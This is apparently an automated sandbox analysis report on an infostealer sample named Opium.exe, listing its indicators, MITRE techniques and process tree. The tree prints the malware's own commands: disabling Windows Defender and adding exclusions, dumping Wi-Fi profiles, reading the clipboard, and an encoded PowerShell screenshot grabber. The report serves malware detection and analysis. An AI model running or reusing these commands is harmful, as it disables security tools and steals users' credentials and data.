e9b75e4351e9bfcaef1df3822dc94fdc588dd2a95074d9d5044a058ae869273a

Analysis

max time kernel
104s
max time network
111s
platform
windows11-21h2_x64
resource
win11-20240412-en
resource tags

arch:x64arch:x86image:win11-20240412-enlocale:en-usos:windows11-21h2-x64system
submitted
16/04/2024, 17:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Opium.exe
Size

6.3MB
MD5

51a4b92d3d474b74c99f9bf8006adcf8
SHA1

876c3445e81651d207beedcdbc42384b7c6579f5
SHA256

25f1cc14c6f92b5300f016dbd6fae84ccd5e8c95cada73463b3b4963fcf12f16
SHA512

7aec357d2b1ed372f193ebed8a3dde3ece67d7ca76036c0a00c74141ea15a8dac4d6c1a34a9cc039110e993c6b4fbc11d85a251a69224752620badbe0a340778
SSDEEP

98304:CQ91G75YthUySccRacg/BGfO1q4HNK0zbup/xzcq8zAFPjv9JT1sOBN3o1SX:F45e6ySraRRnz+R8zmPf1D7JX

Score

8^/10

spyware stealer upx

Malware Config

Signatures

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Opium.exe

ACProtect 1.3x - 1.4x DLL software 16 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral1/files/0x000100000002aa53-21.dat	acprotect
behavioral1/files/0x000100000002aa46-27.dat	acprotect
behavioral1/files/0x000100000002aa51-30.dat	acprotect
behavioral1/files/0x000100000002aa52-35.dat	acprotect
behavioral1/files/0x000100000002aa50-34.dat	acprotect
behavioral1/files/0x000100000002aa49-44.dat	acprotect
behavioral1/files/0x000100000002aa48-43.dat	acprotect
behavioral1/files/0x000100000002aa47-42.dat	acprotect
behavioral1/files/0x000100000002aa45-41.dat	acprotect
behavioral1/files/0x000100000002aa58-40.dat	acprotect
behavioral1/files/0x000100000002aa57-39.dat	acprotect
behavioral1/files/0x000100000002aa56-38.dat	acprotect
behavioral1/files/0x000100000002aa4b-46.dat	acprotect
behavioral1/files/0x000100000002aa4d-48.dat	acprotect
behavioral1/files/0x000100000002aa4c-47.dat	acprotect
behavioral1/files/0x000100000002aa4a-45.dat	acprotect

Executes dropped EXE 1 IoCs

pid	Process
1444	rar.exe

Loads dropped DLL 16 IoCs

pid	Process
4308	Opium.exe
4308	Opium.exe
4308	Opium.exe
4308	Opium.exe
4308	Opium.exe
4308	Opium.exe
4308	Opium.exe
4308	Opium.exe
4308	Opium.exe
4308	Opium.exe
4308	Opium.exe
4308	Opium.exe
4308	Opium.exe
4308	Opium.exe
4308	Opium.exe
4308	Opium.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 53 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000100000002aa53-21.dat	upx
behavioral1/memory/4308-24-0x0000000075030000-0x0000000075540000-memory.dmp	upx
behavioral1/files/0x000100000002aa46-27.dat	upx
behavioral1/memory/4308-29-0x0000000074FC0000-0x0000000074FDE000-memory.dmp	upx
behavioral1/files/0x000100000002aa51-30.dat	upx
behavioral1/memory/4308-32-0x0000000074FB0000-0x0000000074FBD000-memory.dmp	upx
behavioral1/files/0x000100000002aa52-35.dat	upx
behavioral1/files/0x000100000002aa50-34.dat	upx
behavioral1/files/0x000100000002aa49-44.dat	upx
behavioral1/files/0x000100000002aa48-43.dat	upx
behavioral1/files/0x000100000002aa47-42.dat	upx
behavioral1/files/0x000100000002aa45-41.dat	upx
behavioral1/files/0x000100000002aa58-40.dat	upx
behavioral1/files/0x000100000002aa57-39.dat	upx
behavioral1/files/0x000100000002aa56-38.dat	upx
behavioral1/files/0x000100000002aa4b-46.dat	upx
behavioral1/files/0x000100000002aa4d-48.dat	upx
behavioral1/files/0x000100000002aa4c-47.dat	upx
behavioral1/files/0x000100000002aa4a-45.dat	upx
behavioral1/memory/4308-54-0x0000000074F80000-0x0000000074FA7000-memory.dmp	upx
behavioral1/memory/4308-56-0x0000000074F60000-0x0000000074F78000-memory.dmp	upx
behavioral1/memory/4308-58-0x0000000074F40000-0x0000000074F5B000-memory.dmp	upx
behavioral1/memory/4308-60-0x0000000074E00000-0x0000000074F37000-memory.dmp	upx
behavioral1/memory/4308-63-0x0000000074DE0000-0x0000000074DF6000-memory.dmp	upx
behavioral1/memory/4308-64-0x0000000074DA0000-0x0000000074DAC000-memory.dmp	upx
behavioral1/memory/4308-66-0x0000000074D70000-0x0000000074D9C000-memory.dmp	upx
behavioral1/memory/4308-69-0x00000000749E0000-0x0000000074D6C000-memory.dmp	upx
behavioral1/memory/4308-70-0x0000000075030000-0x0000000075540000-memory.dmp	upx
behavioral1/memory/4308-71-0x0000000074930000-0x00000000749D9000-memory.dmp	upx
behavioral1/memory/4308-73-0x0000000074FC0000-0x0000000074FDE000-memory.dmp	upx
behavioral1/memory/4308-76-0x00000000748D0000-0x00000000748E0000-memory.dmp	upx
behavioral1/memory/4308-78-0x00000000748C0000-0x00000000748CC000-memory.dmp	upx
behavioral1/memory/4308-77-0x0000000074780000-0x0000000074898000-memory.dmp	upx
behavioral1/memory/4308-86-0x0000000074F40000-0x0000000074F5B000-memory.dmp	upx
behavioral1/memory/4308-110-0x0000000074E00000-0x0000000074F37000-memory.dmp	upx
behavioral1/memory/4308-111-0x0000000074DE0000-0x0000000074DF6000-memory.dmp	upx
behavioral1/memory/4308-142-0x0000000075030000-0x0000000075540000-memory.dmp	upx
behavioral1/memory/4308-143-0x0000000074FC0000-0x0000000074FDE000-memory.dmp	upx
behavioral1/memory/4308-151-0x0000000074D70000-0x0000000074D9C000-memory.dmp	upx
behavioral1/memory/4308-152-0x00000000749E0000-0x0000000074D6C000-memory.dmp	upx
behavioral1/memory/4308-153-0x0000000074930000-0x00000000749D9000-memory.dmp	upx
behavioral1/memory/4308-157-0x0000000074D70000-0x0000000074D9C000-memory.dmp	upx
behavioral1/memory/4308-158-0x00000000749E0000-0x0000000074D6C000-memory.dmp	upx
behavioral1/memory/4548-168-0x00000000032F0000-0x0000000003300000-memory.dmp	upx
behavioral1/memory/4308-321-0x0000000075030000-0x0000000075540000-memory.dmp	upx
behavioral1/memory/4308-322-0x0000000074FC0000-0x0000000074FDE000-memory.dmp	upx
behavioral1/memory/4308-336-0x0000000074E00000-0x0000000074F37000-memory.dmp	upx
behavioral1/memory/4308-426-0x0000000075030000-0x0000000075540000-memory.dmp	upx
behavioral1/memory/4308-469-0x0000000075030000-0x0000000075540000-memory.dmp	upx
behavioral1/memory/4308-484-0x0000000075030000-0x0000000075540000-memory.dmp	upx
behavioral1/memory/4308-485-0x0000000074FC0000-0x0000000074FDE000-memory.dmp	upx
behavioral1/memory/4308-486-0x0000000074FB0000-0x0000000074FBD000-memory.dmp	upx
behavioral1/memory/4308-487-0x0000000074F80000-0x0000000074FA7000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
1	discord.com
14	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com
10	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4116	WMIC.exe
1956	WMIC.exe
2108	WMIC.exe

Enumerates processes with tasklist 1 TTPs 5 IoCs

Process Discovery

T1057

pid	Process
2064	tasklist.exe
3188	tasklist.exe
1988	tasklist.exe
3004	tasklist.exe
484	tasklist.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4860	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 26 IoCs

pid	Process
3640	powershell.exe
4820	powershell.exe
3640	powershell.exe
4820	powershell.exe
4548	powershell.exe
4548	powershell.exe
4548	powershell.exe
4548	powershell.exe
4832	powershell.exe
4832	powershell.exe
4156	powershell.exe
4156	powershell.exe
4832	powershell.exe
4156	powershell.exe
3224	powershell.exe
3224	powershell.exe
3892	powershell.exe
3892	powershell.exe
3868	chrome.exe
3868	chrome.exe
2528	powershell.exe
2528	powershell.exe
2528	powershell.exe
2792	powershell.exe
2792	powershell.exe
2792	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2064	tasklist.exe
Token: SeIncreaseQuotaPrivilege	4704	WMIC.exe
Token: SeSecurityPrivilege	4704	WMIC.exe
Token: SeTakeOwnershipPrivilege	4704	WMIC.exe
Token: SeLoadDriverPrivilege	4704	WMIC.exe
Token: SeSystemProfilePrivilege	4704	WMIC.exe
Token: SeSystemtimePrivilege	4704	WMIC.exe
Token: SeProfSingleProcessPrivilege	4704	WMIC.exe
Token: SeIncBasePriorityPrivilege	4704	WMIC.exe
Token: SeCreatePagefilePrivilege	4704	WMIC.exe
Token: SeBackupPrivilege	4704	WMIC.exe
Token: SeRestorePrivilege	4704	WMIC.exe
Token: SeShutdownPrivilege	4704	WMIC.exe
Token: SeDebugPrivilege	4704	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4704	WMIC.exe
Token: SeRemoteShutdownPrivilege	4704	WMIC.exe
Token: SeUndockPrivilege	4704	WMIC.exe
Token: SeManageVolumePrivilege	4704	WMIC.exe
Token: 33	4704	WMIC.exe
Token: 34	4704	WMIC.exe
Token: 35	4704	WMIC.exe
Token: 36	4704	WMIC.exe
Token: SeDebugPrivilege	3640	powershell.exe
Token: SeDebugPrivilege	4820	powershell.exe
Token: SeIncreaseQuotaPrivilege	4704	WMIC.exe
Token: SeSecurityPrivilege	4704	WMIC.exe
Token: SeTakeOwnershipPrivilege	4704	WMIC.exe
Token: SeLoadDriverPrivilege	4704	WMIC.exe
Token: SeSystemProfilePrivilege	4704	WMIC.exe
Token: SeSystemtimePrivilege	4704	WMIC.exe
Token: SeProfSingleProcessPrivilege	4704	WMIC.exe
Token: SeIncBasePriorityPrivilege	4704	WMIC.exe
Token: SeCreatePagefilePrivilege	4704	WMIC.exe
Token: SeBackupPrivilege	4704	WMIC.exe
Token: SeRestorePrivilege	4704	WMIC.exe
Token: SeShutdownPrivilege	4704	WMIC.exe
Token: SeDebugPrivilege	4704	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4704	WMIC.exe
Token: SeRemoteShutdownPrivilege	4704	WMIC.exe
Token: SeUndockPrivilege	4704	WMIC.exe
Token: SeManageVolumePrivilege	4704	WMIC.exe
Token: 33	4704	WMIC.exe
Token: 34	4704	WMIC.exe
Token: 35	4704	WMIC.exe
Token: 36	4704	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4116	WMIC.exe
Token: SeSecurityPrivilege	4116	WMIC.exe
Token: SeTakeOwnershipPrivilege	4116	WMIC.exe
Token: SeLoadDriverPrivilege	4116	WMIC.exe
Token: SeSystemProfilePrivilege	4116	WMIC.exe
Token: SeSystemtimePrivilege	4116	WMIC.exe
Token: SeProfSingleProcessPrivilege	4116	WMIC.exe
Token: SeIncBasePriorityPrivilege	4116	WMIC.exe
Token: SeCreatePagefilePrivilege	4116	WMIC.exe
Token: SeBackupPrivilege	4116	WMIC.exe
Token: SeRestorePrivilege	4116	WMIC.exe
Token: SeShutdownPrivilege	4116	WMIC.exe
Token: SeDebugPrivilege	4116	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4116	WMIC.exe
Token: SeRemoteShutdownPrivilege	4116	WMIC.exe
Token: SeUndockPrivilege	4116	WMIC.exe
Token: SeManageVolumePrivilege	4116	WMIC.exe
Token: 33	4116	WMIC.exe
Token: 34	4116	WMIC.exe

Suspicious use of FindShellTrayWindow 34 IoCs

pid	Process
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe

Suspicious use of SendNotifyMessage 16 IoCs

pid	Process
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe
3868	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1604 wrote to memory of 4308	1604	Opium.exe	80
PID 1604 wrote to memory of 4308	1604	Opium.exe	80
PID 1604 wrote to memory of 4308	1604	Opium.exe	80
PID 4308 wrote to memory of 892	4308	Opium.exe	84
PID 4308 wrote to memory of 892	4308	Opium.exe	84
PID 4308 wrote to memory of 892	4308	Opium.exe	84
PID 4308 wrote to memory of 4776	4308	Opium.exe	85
PID 4308 wrote to memory of 4776	4308	Opium.exe	85
PID 4308 wrote to memory of 4776	4308	Opium.exe	85
PID 4308 wrote to memory of 5068	4308	Opium.exe	88
PID 4308 wrote to memory of 5068	4308	Opium.exe	88
PID 4308 wrote to memory of 5068	4308	Opium.exe	88
PID 4308 wrote to memory of 1320	4308	Opium.exe	90
PID 4308 wrote to memory of 1320	4308	Opium.exe	90
PID 4308 wrote to memory of 1320	4308	Opium.exe	90
PID 892 wrote to memory of 4820	892	cmd.exe	93
PID 892 wrote to memory of 4820	892	cmd.exe	93
PID 892 wrote to memory of 4820	892	cmd.exe	93
PID 4776 wrote to memory of 3640	4776	cmd.exe	92
PID 4776 wrote to memory of 3640	4776	cmd.exe	92
PID 4776 wrote to memory of 3640	4776	cmd.exe	92
PID 5068 wrote to memory of 2064	5068	cmd.exe	94
PID 5068 wrote to memory of 2064	5068	cmd.exe	94
PID 5068 wrote to memory of 2064	5068	cmd.exe	94
PID 1320 wrote to memory of 4704	1320	cmd.exe	95
PID 1320 wrote to memory of 4704	1320	cmd.exe	95
PID 1320 wrote to memory of 4704	1320	cmd.exe	95
PID 4308 wrote to memory of 3364	4308	Opium.exe	97
PID 4308 wrote to memory of 3364	4308	Opium.exe	97
PID 4308 wrote to memory of 3364	4308	Opium.exe	97
PID 3364 wrote to memory of 3404	3364	cmd.exe	99
PID 3364 wrote to memory of 3404	3364	cmd.exe	99
PID 3364 wrote to memory of 3404	3364	cmd.exe	99
PID 4308 wrote to memory of 3184	4308	Opium.exe	100
PID 4308 wrote to memory of 3184	4308	Opium.exe	100
PID 4308 wrote to memory of 3184	4308	Opium.exe	100
PID 3184 wrote to memory of 3668	3184	cmd.exe	102
PID 3184 wrote to memory of 3668	3184	cmd.exe	102
PID 3184 wrote to memory of 3668	3184	cmd.exe	102
PID 4308 wrote to memory of 5028	4308	Opium.exe	103
PID 4308 wrote to memory of 5028	4308	Opium.exe	103
PID 4308 wrote to memory of 5028	4308	Opium.exe	103
PID 5028 wrote to memory of 4116	5028	cmd.exe	105
PID 5028 wrote to memory of 4116	5028	cmd.exe	105
PID 5028 wrote to memory of 4116	5028	cmd.exe	105
PID 4308 wrote to memory of 3968	4308	Opium.exe	106
PID 4308 wrote to memory of 3968	4308	Opium.exe	106
PID 4308 wrote to memory of 3968	4308	Opium.exe	106
PID 3968 wrote to memory of 1956	3968	cmd.exe	167
PID 3968 wrote to memory of 1956	3968	cmd.exe	167
PID 3968 wrote to memory of 1956	3968	cmd.exe	167
PID 4308 wrote to memory of 768	4308	Opium.exe	200
PID 4308 wrote to memory of 768	4308	Opium.exe	200
PID 4308 wrote to memory of 768	4308	Opium.exe	200
PID 768 wrote to memory of 4548	768	cmd.exe	111
PID 768 wrote to memory of 4548	768	cmd.exe	111
PID 768 wrote to memory of 4548	768	cmd.exe	111
PID 4308 wrote to memory of 4972	4308	Opium.exe	112
PID 4308 wrote to memory of 4972	4308	Opium.exe	112
PID 4308 wrote to memory of 4972	4308	Opium.exe	112
PID 4308 wrote to memory of 1792	4308	Opium.exe	113
PID 4308 wrote to memory of 1792	4308	Opium.exe	113
PID 4308 wrote to memory of 1792	4308	Opium.exe	113
PID 4308 wrote to memory of 2324	4308	Opium.exe	116

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3512	attrib.exe
3588	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Opium.exe
"C:\Users\Admin\AppData\Local\Temp\Opium.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1604
- C:\Users\Admin\AppData\Local\Temp\Opium.exe
  "C:\Users\Admin\AppData\Local\Temp\Opium.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4308
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Opium.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:892
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Opium.exe'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4820
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4776
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3640
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5068
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2064
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1320
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4704
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3364
  - - C:\Windows\SysWOW64\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:3404
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3184
  - - C:\Windows\SysWOW64\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:3668
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5028
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:4116
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3968
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:1956
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:768
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎ .scr'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4548
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4972
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3188
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:1792
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1988
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:2324
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:4900
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    PID:3256
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4832
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:844
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3004
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4984
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      PID:2984
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    PID:3388
  - - C:\Windows\SysWOW64\netsh.exe
      netsh wlan show profile
      4⤵
      PID:3800
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:2352
  - - C:\Windows\SysWOW64\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:4860
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:3512
  - - C:\Windows\SysWOW64\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:840
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpA